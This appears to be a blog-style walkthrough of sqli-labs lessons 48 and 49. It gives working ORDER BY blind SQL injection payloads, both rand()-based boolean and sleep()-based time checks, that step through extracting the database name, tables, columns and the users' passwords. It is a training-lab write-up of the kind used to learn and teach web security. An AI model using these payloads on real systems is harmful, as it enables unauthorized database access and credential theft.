Contents
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
一、Recommended reading:
[SQL injection] Stacked injection: https://blog.csdn.net/qq_53079406/article/details/125798787
[SQL injection] Numeric injection & string injection: https://blog.csdn.net/qq_53079406/article/details/125741101
[SQL injection, no echo] Boolean-based blind injection: principle, functions, exploitation process: https://blog.csdn.net/qq_53079406/article/details/125275974
[SQL injection, no echo] Time-based blind injection: principle, functions, exploitation process: https://blog.csdn.net/qq_53079406/article/details/125096394
二、Basic steps of (manual) SQL injection:
Step 1: test for an injection point
Step 2: analyze privileges
Step 3: determine the number of columns
Step 4: dump the database name
Step 5: dump table names
Step 6: dump column names
Step 7: dump data
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
3.1、Overview (ORDER BY injection, blind, GET)
Request method: GET
Technique: ORDER BY injection + blind injection + numeric injection
3.2、Step 1: test for an injection point
Following the hint, request ?sort=1
Then append a single quote (?sort=1')
The page no longer renders normally, so the parameter is injectable.
No error message is displayed, so blind injection is required (boolean-based or time-based).
?sort=rand(true)
?sort=rand(false)
The two requests return the rows in two different orders, and each order is stable across repeated requests: ORDER BY rand(seed) yields a fixed permutation per seed. A condition placed inside rand() therefore reproduces either the rand(true) ordering or the rand(false) ordering, which is enough for boolean-based blind injection.
3.3、Step 2: analyze filtering
Method 1:
Replace the characters of the payload one at a time until the page stops failing (slow),
or replace them all at once (if it still fails you cannot tell which character was filtered).
Method 2:
Get hold of the source code and audit it (white-box; the best option).
3.4、Step 3: determine the number of columns / display positions
?sort=3
Page renders normally
?sort=4
Page breaks (ORDER BY 4 fails because the SELECT returns only 3 columns; the error itself is hidden)
So the query has 3 columns
3.5、Step 4: dump the database name
?sort=rand(left(database(),1)>'s')
The page matches the rand(false) result, so this condition is false.
Narrowing the guess down eventually gives:
?sort=rand(left(database(),1)='s')
The page matches the rand(true) result, so the condition holds: the first character of the database name is s.
Repeat for the other positions (change the length/position argument being compared) to recover security.
Caveat: '>' and '=' on strings follow the connection's collation, which in a default MySQL setup is case-insensitive, so 's' and 'S' cannot be told apart; when case matters, compare ascii(substr(database(),N,1)) against integers instead.
Alternatively, time-based blind injection:
?sort=1 and if(substr(database(),1,1)='s',sleep(5),0)
Caveat: an expression in ORDER BY is evaluated once per row, so sleep(5) fires once for every row the query sorts and the total delay is 5 seconds multiplied by the row count; pick a small sleep value.
3.6、Step 5: dump table names
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)>'e')
The page matches the rand(false) result, so the condition is false.
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e')
The page matches the rand(true) result, so the condition holds.
Working through the characters one at a time gives the tables:
emails referers uagents users
Alternatively, time-based blind injection:
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
3.7、Step 6: dump column names
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)>'u')
The page matches the rand(false) result, so the condition is false.
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)='u')
The page matches the rand(true) result, so the condition holds.
Continue in the same way to recover the remaining columns.
Caveat: filtering on table_name alone also matches a table called users in any other schema the account can see; add "and table_schema=database()" to the WHERE clause to keep the result to the current database.
Alternatively, time-based blind injection:
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)
3.8、Step 7: dump data
?sort=rand(left((select group_concat(password) from security.users),1)>'1')
The page matches the rand(false) result, so the condition is false.
?sort=rand(left((select group_concat(password) from security.users),1)='1')
The page matches the rand(true) result, so the condition holds.
Alternatively, time-based blind injection:
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
4.1、Overview (ORDER BY injection, blind, GET)
Request method: GET
Technique: ORDER BY injection + blind injection + string injection
4.2、Exploitation:
Compared with Less48, the sort parameter is wrapped in single quotes, so the payload has to close the quote and comment out the trailing one; otherwise the steps are the same. For example, the time-based check for the first character of the database name becomes:
?sort=1' and if(substr(database(),1,1)='s',sleep(5),0)--+